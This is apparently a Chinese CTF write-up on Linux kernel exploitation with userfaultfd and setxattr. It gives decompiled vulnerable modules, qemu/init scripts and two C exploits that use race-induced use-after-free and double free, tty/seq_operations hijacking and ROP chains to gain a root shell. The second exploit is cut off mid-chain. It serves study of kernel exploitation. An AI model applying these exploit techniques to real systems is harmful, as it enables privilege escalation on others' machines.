Kernel Pwn Syscall userfaultfd and Syscall setxattr

userfaultfd 是一个系统调用, 可以用来自定义 handler 处理缺页等情况. 简单来说是通过新建一个线程, 然后监视一个页面. 在任何时刻出现了缺页的情况, 触发缺页的线程挂起, 监视线程进行处理, 处理完毕后唤醒之前挂起的线程.

在 CTF 题中通常用来卡条件竞争. 当内核模块中有 copy from/to user 的时候, 内核模块会访问用户的空间. 如果我们传入的是一个被 uffd 监视的地址, 那么这个线程将会被挂起直到处理结束. 这样就能够控制内核中线程的执行顺序, 从而更好的达到想要的竞争效果.

uffd 使用模板如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
cpu_set_t cpu;

void set_cpu(int id) {
    CPU_ZERO(&cpu);
    CPU_SET(id, &cpu);
    sched_setaffinity(0, sizeof(cpu_set_t), &cpu);
}

static void *fault_handler_thread(void *arg) {
    static int fault_cnt = 0;
    char *page = malloc(0x1000);
    static struct uffd_msg msg;
    struct uffdio_copy copy;
    struct pollfd pollfd;
    long uffd;t
    set_cpu(0);

    uffd = (long)arg;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;

    while (poll(&pollfd, 1, -1) > 0) {
        read(uffd, &msg, sizeof(msg));
        printvar(success, "fault count", fault_cnt);

        switch (fault_cnt++) {
            case 0: {
                break;
            }
        }

        copy.src = (size_t)page;
        copy.dst = (size_t)msg.arg.pagefault.address & ~(0x1000 - 1);
        copy.len = 0x1000;
        copy.mode = 0;
        copy.copy = 0;
        ioctl(uffd, UFFDIO_COPY, &copy);
    }
    return NULL;
}

void register_userfaultfd(void *addr, unsigned long len, void *(*handler)(void*)) {
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;
    pthread_t monitor_thread;
    long uffd;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    ioctl(uffd, UFFDIO_API, &uffdio_api);

    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    ioctl(uffd, UFFDIO_REGISTER, &uffdio_register);

    pthread_create(&monitor_thread, NULL, handler, (void *) uffd);
}

其中, register_userfaultfd(addr, len, handler) 用来创建一个线程, 监视地址 addr 到 addr + len 的缺页情况, 监视线程函数 fault_handler_thread 不断 poll 查询并处理, 其中用 switch case 结构来对每一次的缺页进行不同的流程. 最后 ioctl(uffd, UFFDIO_COPY, &copy) 完唤起触发缺页的线程.

同时还用 sched_setaffinity 将线程调度全限制在一个 CPU 上, 这样主线程触发缺页以后, 转到监视线程处理, 最后回到主线程这个调度顺序就不会变了.

(复现的时候认为 module 地址的偏移和 kernel base 一样, 没有泄漏地址就写 ROP 链了, 不想改了, 就当没有 kaslr 吧, 反正重点不在这)

qemu 启动脚本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
#!/bin/sh
qemu-system-x86_64 \
    -m 128M \
    -kernel bzImage \
    -initrd rootfs.cpio \
    -append "console=ttyS0 oops=panic panic=1 nokaslr" \
    -nographic \
    -net user \
    -net nic \
    -device e1000 \
    -smp cores=2,threads=2 \
    -cpu kvm64,+smep,+smap \
    -monitor /dev/null 2>/dev/null \
    -s

开启 smep, smap, kpti.

init:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/bin/sh
/bin/mount -t devtmpfs devtmpfs /dev
chown root:tty /dev/console
chown root:tty /dev/ptmx
chown root:tty /dev/tty
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts

mount -t proc proc /proc
mount -t sysfs sysfs /sys

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

ifup eth0 > /dev/null 2>/dev/null

insmod notebook.ko
cat /proc/modules | grep notebook > /tmp/moduleaddr
chmod 777 /tmp/moduleaddr
chmod 777 /dev/notebook
poweroff -d 300 -f &
echo "Welcome to QWB!"

#sh
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys

poweroff -d 1 -n -f

module 是个菜单题, 堆有 16 个, 实现了 read 和 write:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
__int64 __fastcall mynote_read(__int64 a1, __int64 a2)
{
  unsigned __int64 v2; // rdx
  unsigned __int64 idx; // rdx
  __int64 size; // r13
  char *note; // rbx

  _fentry__(a1, a2);
  if ( v2 > 0x10 )
  {
    printk("[x] Read idx out of range.\n");
    return -1LL;
  }
  else
  {
    idx = v2;
    size = notebook[idx].size;
    note = notebook[idx].note;
    _check_object_size(note, size, 1LL);
    copy_to_user(a2, note, size);
    printk("[*] Read success.\n");
    return 0LL;
  }
}
__int64 __fastcall mynote_write(__int64 a1, __int64 a2)
{
  unsigned __int64 v2; // rdx
  unsigned __int64 v3; // rdx
  __int64 size; // r13
  char *note; // rbx

  _fentry__(a1, a2);
  if ( v2 > 0x10 )
  {
    printk("[x] Write idx out of range.\n");
    return -1LL;
  }
  else
  {
    v3 = v2;
    size = notebook[v3].size;
    note = notebook[v3].note;
    _check_object_size(note, size, 0LL);
    if ( copy_from_user(note, a2, size) )
    {
      printk("[x] copy from user error.\n");
      return 0LL;
    }
    else
    {
      printk("[*] Write success.\n");
      return 0LL;
    }
  }
}

还实现了 add, del, edit:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
__int64 __fastcall noteadd(unsigned __int64 idx, unsigned __int64 size_1, __int64 buf)
{
  __int64 buf_1; // rdx
  __int64 buf_2; // r13
  NoteBook *cur; // rbx
  __int64 size; // r14
  __int64 v7; // rbx

  _fentry__(idx, size_1);
  if ( idx > 0xF )
  {
    v7 = -1LL;
    printk("[x] Add idx out of range.\n");
  }
  else
  {
    buf_2 = buf_1;
    cur = &notebook[idx];
    raw_read_lock(&lock);
    size = cur->size;
    cur->size = size_1;
    if ( size_1 > 0x60 )
    {
      cur->size = size;
      v7 = -2LL;
      printk("[x] Add size out of range.\n");
    }
    else
    {
      copy_from_user(name, buf_2, 256LL);
      if ( cur->note )
      {
        cur->size = size;
        v7 = -3LL;
        printk("[x] Add idx is not empty.\n");
      }
      else
      {
        cur->note = (char *)_kmalloc(size_1, 0x24000C0LL);
        printk("[+] Add success. %s left a note.\n", name);
        v7 = 0LL;
      }
    }
    raw_read_unlock(&lock);
  }
  return v7;
}

__int64 __fastcall notedel(unsigned __int64 idx, __int64 a2)
{
  NoteBook *v2; // rbx

  _fentry__(idx, a2);
  if ( idx > 0x10 )
  {
    printk("[x] Delete idx out of range.\n");
    return -1LL;
  }
  else
  {
    raw_write_lock(&lock);
    v2 = &notebook[idx];
    kfree(v2->note);
    if ( v2->size )
    {
      v2->size = 0LL;
      v2->note = 0LL;
    }
    raw_write_unlock(&lock);
    printk("[-] Delete success.\n");
    return 0LL;
  }
}

__int64 __fastcall noteedit(unsigned __int64 idx, __int64 new_size)
{
  __int64 v2; // rdx
  __int64 v3; // r13
  NoteBook *cur; // rbx
  __int64 old_size; // rax
  __int64 new_note; // r12
  __int64 v7; // rbx

  _fentry__(idx, new_size);
  if ( idx > 0xF )
  {
    v7 = -1LL;
    printk("[x] Edit idx out of range.\n");
    return v7;
  }
  v3 = v2;
  cur = &notebook[idx];
  raw_read_lock(&lock);
  old_size = cur->size;
  cur->size = new_size;
  if ( old_size == new_size )
  {
    v7 = 1LL;
    goto LABEL_6;
  }
  new_note = krealloc(cur->note, new_size, 37748928LL);
  copy_from_user(name, v3, 256LL);
  if ( !cur->size )
  {
    printk("free in fact");
    cur->note = 0LL;
    v7 = 0LL;
    goto LABEL_6;
  }
  if ( (unsigned __int8)_virt_addr_valid(new_note) )
  {
    cur->note = (char *)new_note;
    v7 = 2LL;
LABEL_6:
    raw_read_unlock(&lock);
    printk("[o] Edit success. %s edit a note.\n", name);
    return v7;
  }
  printk("[x] Return ptr unvalid.\n");
  raw_read_unlock(&lock);
  return 3LL;
}

并且给了一个 gift 获得 notebook 内容, 也就是可以得到 object 地址

1
2
3
4
5
6
7
8
__int64 __fastcall notegift(__int64 a1, __int64 a2)
{
  _fentry__(a1, a2);
  printk("[*] The notebook needs to be written from beginning to end.\n");
  copy_to_user(a1, notebook, 0x100LL);
  printk("[*] For this special year, I give you a gift!\n");
  return 100LL;
}

add 限制了大小, 但是 edit 中使用 realloc 并没有限制, 而且如果是 newsize = 0, 那么实际上是 free. 这样 del 功能可以扬了, 并且不会上写锁, 全是读锁和没锁一样, 就不用管锁了.

注意到 krealloc 后面有一句 copy_from_user, 可以用 uffd 让他卡在这里, 此时 cur->note 被 free 了, 但是没有置零. 在监视线程处理的时候, 就可以 UAF 了. 没有大小限制, 这里使用 struct tty 来 UAF 写 ops, 最后触发 ioctl 栈迁移到事先布置好的 ROP chain 即可.

稍微注意一点是覆盖 struct tty 用的 write 写, 写多少是由 notebook.size 指定的. 虽然 struct tty 从 slub kmalloc-1k 中取, 但是他的大小没有这么多, 直接申请 0x100 然后写的话会覆盖其他结构导致错误.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
// musl-gcc exp.c -static -masm=intel -g -o exp -idirafter /usr/include/ -idirafter /usr/include/x86_64-linux-gnu/
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/sem.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <linux/userfaultfd.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <sched.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <semaphore.h>

void success(const char *msg) {
    char *buf = calloc(0x1000, 1);
    sprintf(buf, "\033[32m\033[1m[+] %s\033[0m", msg);
    fprintf(stderr, "%s", buf);
    free(buf);
}

void fail(const char *msg) {
    char *buf = calloc(0x1000, 1);
    sprintf(buf, "\033[31m\033[1m[x] %s\033[0m", msg);
    fprintf(stderr, "%s", buf);
    free(buf);
}

void debug(const char *msg) {
#ifdef DEBUG
    char *buf = calloc(0x1000, 1);
    sprintf(buf, "\033[34m\033[1m[*] %s\033[0m", msg);
    fprintf(stderr, "%s", buf);
    free(buf);
#endif
}

void printvar(void print_handle(const char *), char *hint, size_t var) {
    char *buf = calloc(0x1000, 1);
    sprintf(buf, "%s: 0x%lx\n", hint, var);
    print_handle(buf);
    free(buf);
}

size_t user_cs, user_ss, user_rflags, user_sp;
void saveStatus() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    user_sp &= ~0xf;
    success("Status has been saved.\n");
    printvar(debug, "cs", user_cs);
    printvar(debug, "ss", user_ss);
    printvar(debug, "rsp", user_sp);
    printvar(debug, "rflags", user_rflags);
}

void getRootShell() {
    success("Backing from the kernelspace.\n");
    if(getuid()) {
        fail("Failed to get the root!\n");
        exit(-1);
    }
    success("Successful to get the root. Execve root shell now...\n");
    system("/bin/sh");
    exit(0);// to exit the process normally instead of segmentation fault
}

#define ADD  0x100
#define FREE 0x200
#define EDIT 0x300
#define GIFT 0x64

size_t module_addr;
size_t kernel_offset;
size_t push_rdi_pop_rsp_pop_rbp_ret = 0xffffffff8143f4e1;
size_t pop_rsp_ret = 0xffffffff810bc110;
size_t pop_rdi_ret = 0xffffffff81007115;
size_t init_cred = 0xffffffff8225c940;
size_t commit_creds = 0xffffffff810a9b40;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81a0093f;
size_t fake_tty_operations_addr;
size_t rop_chain_addr;
cpu_set_t cpu;
int fd, tty_fd;

struct Args {
  size_t idx;
  size_t size;
  char *buf;
} args;

static void *fault_handler_thread(void *arg) {
    static struct uffd_msg msg;
    struct uffdio_copy copy;
    struct pollfd pollfd;
    long uffd;
    char *page = malloc(0x1000);
    static int fault_cnt = 0;

    sched_setaffinity(0, sizeof(cpu_set_t), &cpu);

    uffd = (long)arg;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;

    while (poll(&pollfd, 1, -1) > 0) {
        read(uffd, &msg, sizeof(msg));
        printvar(success, "fault count", fault_cnt);
        printvar(debug, "addr", msg.arg.pagefault.address);
        switch (fault_cnt++) {
            case 0: {
                tty_fd = open("/dev/ptmx", O_RDWR);
                args.idx = 1;
                args.buf = malloc(0x2e0);
                args.size = 0x2e0;
                size_t *fake_tty_struct = (size_t *)args.buf;
                ioctl(fd, GIFT, &args);
                printvar(debug, "tty", ((size_t *)args.buf)[2]);
                ioctl(fd, EDIT, &args);
                read(fd, fake_tty_struct, 1);
                fake_tty_struct[1] = pop_rsp_ret;
                fake_tty_struct[2] = rop_chain_addr;
                fake_tty_struct[3] = fake_tty_operations_addr;
                write(fd, fake_tty_struct, 1);
                break;
            }
        }

        copy.src = (size_t)page;
        copy.dst = (size_t)msg.arg.pagefault.address & ~(0x1000 - 1);
        copy.len = 0x1000;
        copy.mode = 0;
        copy.copy = 0;
        ioctl(uffd, UFFDIO_COPY, &copy);
    }
    return NULL;
}

void register_userfaultfd(void *addr, unsigned long len, void *(*handler)(void*)) {
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;
    pthread_t monitor_thread;
    long uffd;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    ioctl(uffd, UFFDIO_API, &uffdio_api);

    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    ioctl(uffd, UFFDIO_REGISTER, &uffdio_register);

    pthread_create(&monitor_thread, NULL, handler, (void *) uffd);
}

void pwn() {
    CPU_ZERO(&cpu);
    CPU_SET(0, &cpu);
    sched_setaffinity(0, sizeof(cpu_set_t), &cpu);

    FILE *stream = fopen("/tmp/moduleaddr", "r");
    char *trash = malloc(0x100);
    fscanf(stream, "%1$s%1$s%1$s%1$s%1$s%2$lx", trash, &module_addr);
    printvar(success, "module addr", module_addr);
    kernel_offset = module_addr - 0xffffffffc0002000;
    printvar(success, "kernel offset", kernel_offset);

    push_rdi_pop_rsp_pop_rbp_ret += kernel_offset;
    pop_rsp_ret += kernel_offset;
    pop_rdi_ret += kernel_offset;
    init_cred += kernel_offset;
    commit_creds += kernel_offset;
    swapgs_restore_regs_and_return_to_usermode += kernel_offset;

    fd = open("/dev/notebook", O_RDWR);
    args.idx = 0;
    args.size = 0x8 * 12;
    args.buf = malloc(0x100);

    size_t *payload = malloc(0x100);
    size_t *rop = payload;
    *rop++ = push_rdi_pop_rsp_pop_rbp_ret;
    *rop++ = pop_rdi_ret;
    *rop++ = init_cred;
    *rop++ = commit_creds;
    *rop++ = swapgs_restore_regs_and_return_to_usermode;
    *rop++ = 0;
    *rop++ = 0;
    *rop++ = (size_t)getRootShell;
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop++ = user_ss;

    ioctl(fd, ADD, &args);
    write(fd, payload, 0);
    ioctl(fd, GIFT, &args);
    fake_tty_operations_addr = ((size_t *)args.buf)[0] - 8 * 12;
    rop_chain_addr = ((size_t *)args.buf)[0] + 8;
    printvar(debug, "fake tty_operations", fake_tty_operations_addr);

    char *uffd_page = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
    printvar(debug, "uffd page", (size_t)uffd_page);
    register_userfaultfd(uffd_page, 0x1000, fault_handler_thread);

    args.idx = 1;
    args.size = 0x2e0;
    ioctl(fd, EDIT, &args);
    args.size = 0;
    args.buf = uffd_page;
    ioctl(fd, EDIT, &args);

    ioctl(tty_fd, 0xdeadbeef);
}

int main() {
    signal(SIGSEGV, getRootShell);
    saveStatus();
    pwn();
    return 0;
}

setxattr 也是一个系统调用, 原型如下:

1
2
int setxattr(const char *path, const char *name,
             const void *value, size_t size, int flags);

他的用途是向 path 指向的文件添加属性 name: value. 其中有如下实现:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
     size_t size, int flags)
{
    // ...
        kvalue = kvmalloc(size, GFP_KERNEL);
        if (!kvalue)
            return -ENOMEM;
        if (copy_from_user(kvalue, value, size)) {

    // ...

    kvfree(kvalue);

    return error;
}

value 和 size 可以控制. 这里用的 kvmalloc, 根据文档, 他会先尝试 kmalloc, 失败以后再用 vmalloc. 也就是说, 我们可以任意大小分配.

然后跟了一个 copy from user, 从用户空间 value 向刚刚分配出的空间上拷贝 size. 最后使用 kvfree 释放刚刚分配的.

如果我们利用 uffd, 使得该线程卡在 copy from user 的过程中, 这样我们可以向该空间写部分数据, 然后卡住不被释放掉. 如果可以利用 double free 等漏洞, 分配到已被使用的 object 上, 那么就可以造成一个 UAF 写. 这个技术也叫 堆占位.

qemu 启动脚本:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
#!/bin/sh
qemu-system-x86_64 \
    -m 512M \
    -kernel ./bzImage \
    -initrd ./rootfs.cpio \
    -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 kaslr quiet" \
    -cpu kvm64,+smep \
    -net user -net nic -device e1000 \
    -monitor /dev/null \
    -nographic

开启 kaslr, smep, 没有 smap.

init:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

ifup eth0 >/dev/null 2>/dev/null

echo 2 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

chown root:root flag
chmod 400 flag
insmod /root/kstack.ko
chmod 777 /proc/stack

echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
cat /root/banner
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys
poweroff -d 0 -f

kstack.ko 只实现了 ioctl:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
struct Node
{
  int task_860;
  char pad[4];
  char data[8];
  Node *next;
};

__int64 __fastcall proc_ioctl(__int64 a1, int a2, __int64 user_data)
{
  int v4; // r12d
  Node *v5; // r13
  Node *next; // rbx
  Node *node; // rbx
  Node *v9; // rax

  v4 = *(_DWORD *)(__readgsqword((unsigned int)&current_task) + 860);
  if ( a2 == 0x57AC0001 )
  {
    node = (Node *)kmem_cache_alloc(kmalloc_caches[5], 6291648LL);
    node->task_860 = v4;
    v9 = head;
    head = node;
    node->next = v9;
    if ( !copy_from_user(node->data, user_data, 8LL) )
      return 0LL;
    head = node->next;
    kfree(node);
    return -22LL;
  }
  else
  {
    if ( a2 != 0x57AC0002 )
      return 0LL;
    v5 = head;
    if ( !head )
      return 0LL;
    if ( v4 == head->task_860 )
    {
      if ( !copy_to_user(user_data, head->data, 8LL) )
      {
        next = v5;
        head = v5->next;
        goto LABEL_12;
      }
    }
    else
    {
      next = head->next;
      if ( next )
      {
        while ( next->task_860 != v4 )
        {
          v5 = next;
          if ( !next->next )
            return -22LL;
          next = next->next;
        }
        if ( !copy_to_user(user_data, next->data, 8LL) )
        {
          v5->next = next->next;
LABEL_12:
          kfree(next);
          return 0LL;
        }
      }
    }
    return -22LL;
  }
}

差不多是单向链表实现的一个栈, 只不过数据会存一个 current task 偏移 860 位置的值. 调试一下可以知道是进程 pid. 故 pop 操作的逻辑是根据 pid 去找到当前进程先前 push 进去的.

node 从 kmalloc-0x20 中取, 并且没有加锁. push 和 pop 操作后会有 copy to/from user, 那么可以第一次 pop 卡在 kfree 前, 再 pop 一次, 造成 double free. 然后 open stat, 此时 freelist 中的第一个 object 就是 seq_operation. 再 push 卡住, 此时已经写完了 task pid, 但是还没写 data. pop 读取到 seq_operation + 0x8 处的数据, 即可 leak kernel base.

没有写操作, 这里就用 setxattr + uffd 堆占位进行 UAF 写, 覆盖 seq_operation->start 然后 read 劫持 rip.

由于没开 smap, 所以可以观察寄存器, 然后把栈迁移到用户页面上, 并提前布置好 ROP 链. 调试一下, 可控的寄存器似乎只有 rax, rbx, rcx, r9 (read 的第三个参数). rax 是 rip, rbx 和 rcx 太小, 无法 mmap 到, 也找不到合适的 gadget 把栈迁移到 r9 上. 所以使用 xchg eax, esp 这种 gadget. 需要注意的是, 这条 gadget 的地址低位可能不是 0 或者 8, 虽然简单的指令对 rsp 的对齐没有要求, 但是后续 ROP 会调用一些函数, 说不定会崩溃. 所以最好找到地址低位是 0 或者 8 的 gadget. 如果没有, 也可以找 xchg eax, esp; ret imm16; 这种, 低位 + imm16 = 0 / 8 的也行, ret 之后 rsp += imm16 就对齐了.

(或者直接找 mov esp, imm32; ret, imm32 对齐, 这种 gadget 也行, 还更方便)

还需要注意的是, kmalloc-0x20 的 freelist 被破坏了 (设置成了 seq_operation->start 的默认值 singal_start, 是个函数地址), 而起 shell 又会从中申请, 所以在返回用户态后我们需要想办法把填充一下, 这样就不会申请到非法地址了. 可以在最开始 open 几个 stat file, 起 shell 前 close 掉, 把一些 seq_operation 填充进去.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
// musl-gcc exp.c -static -masm=intel -g -o exp -idirafter /usr/include/ -idirafter /usr/include/x86_64-linux-gnu/
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/sem.h>
#include <sys/xattr.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <linux/userfaultfd.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <sched.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <semaphore.h>

size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;

void success(const char *msg) {
    char *buf = calloc(0x1000, 1);
    sprintf(buf, "\033[32m\033[1m[+] %s\033[0m", msg);
    fprintf(stderr, "%s", buf);
    free(buf);
}

void fail(const char *msg) {
    char *buf = calloc(0x1000, 1);
    sprintf(buf, "\033[31m\033[1m[x] %s\033[0m", msg);
    fprintf(stderr, "%s", buf);
    free(buf);
}

void debug(const char *msg) {
#ifdef DEBUG
    char *buf = calloc(0x1000, 1);
    sprintf(buf, "\033[34m\033[1m[*] %s\033[0m", msg);
    fprintf(stderr, "%s", buf);
    free(buf);
#endif
}

void printvar(void print_handle(const char *), char *hint, size_t var) {
    char *buf = calloc(0x1000, 1);
    sprintf(buf, "%s: 0x%lx\n", hint, var);
    print_handle(buf);
    free(buf);
}

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    user_sp &= ~0xf;
    user_sp += 8;
    debug("Status has been saved.\n");
    printvar(debug, "cs", user_cs);
    printvar(debug, "ss", user_ss);
    printvar(debug, "rsp", user_sp);
    printvar(debug, "rflags", user_rflags);
}

void get_root_shell() {
    success("Backing from the kernelspace.\n");
    if(getuid()) {
        fail("Failed to get the root!\n");
        exit(-1);
    }
    success("Successful to get the root. Execve root shell now...\n");
    system("/bin/sh");
    exit(0);// to exit the process normally instead of segmentation fault
}

#define PUSH 0x57AC0001
#define POP  0x57AC0002

int fd, seq_fd, fill_seq_fd[0x100];
size_t xchg_eax_esp_ret_0x148d = 0xffffffff81370f93;
size_t pop_rdi_ret = 0xffffffff81034505;
size_t prepare_kernel_cred = 0xffffffff81069e00;
size_t commit_creds = 0xffffffff81069c10;
size_t push_rax_pop_rdi_ret = 0xffffffff81458e3e;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81600a4a;

cpu_set_t cpu;

void set_cpu(int id) {
    CPU_ZERO(&cpu);
    CPU_SET(id, &cpu);
    sched_setaffinity(0, sizeof(cpu_set_t), &cpu);
}

void register_userfaultfd(void *addr, unsigned long len, void *(*handler)(void*)) {
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;
    pthread_t monitor_thread;
    long uffd;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    ioctl(uffd, UFFDIO_API, &uffdio_api);

    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    ioctl(uffd, UFFDIO_REGISTER, &uffdio_register);

    pthread_create(&monitor_thread, NULL, handler, (void *) uffd);
}

void fill_freelist_and_getsehll() {
    for (int i = 0; i < 0x100; i++)
        close(fill_seq_fd[i]);
    get_root_shell();
}

static void *fault_handler_thread(void *arg) {
    static int fault_cnt = 0;
    char *page = malloc(0x1000);
    static struct uffd_msg msg;
    struct uffdio_copy copy;
    struct pollfd pollfd;
    long uffd;
    set_cpu(0);

    uffd = (long)arg;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;

    while (poll(&pollfd, 1, -1) > 0) {
        read(uffd, &msg, sizeof(msg));
        printvar(success, "fault count", fault_cnt);

        switch (fault_cnt++) {
            case 0: {
                ioctl(fd, POP, page);
                break;
            }
            case 1: {
                size_t stop;
                ioctl(fd, POP, &stop);
                printvar(success, "stop", stop);
                kernel_offset = stop - 0xffffffff8113be80;
                break;
            }
            case 2: {
                size_t addr = xchg_eax_esp_ret_0x148d & 0xffffffff;
                size_t *rop = mmap((void *)(addr >> 12 << 12), 0x4000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
                rop = (size_t *)addr;
                *rop++ = pop_rdi_ret;
                rop = (size_t *)(addr + 0x148d);
                *rop++ = pop_rdi_ret;
                *rop++ = 0;
                *rop++ = prepare_kernel_cred;
                *rop++ = push_rax_pop_rdi_ret;
                *rop++ = commit_creds;
                *rop++ = swapgs_restore_regs_and_return_to_usermode;
                *rop++ = 0;
                *rop++ = 0;
                *rop++ = (size_t) fill_freelist_and_getsehll;
                *rop++ = user_cs;
                *rop++ = user_rflags;
                *rop++ = user_sp;
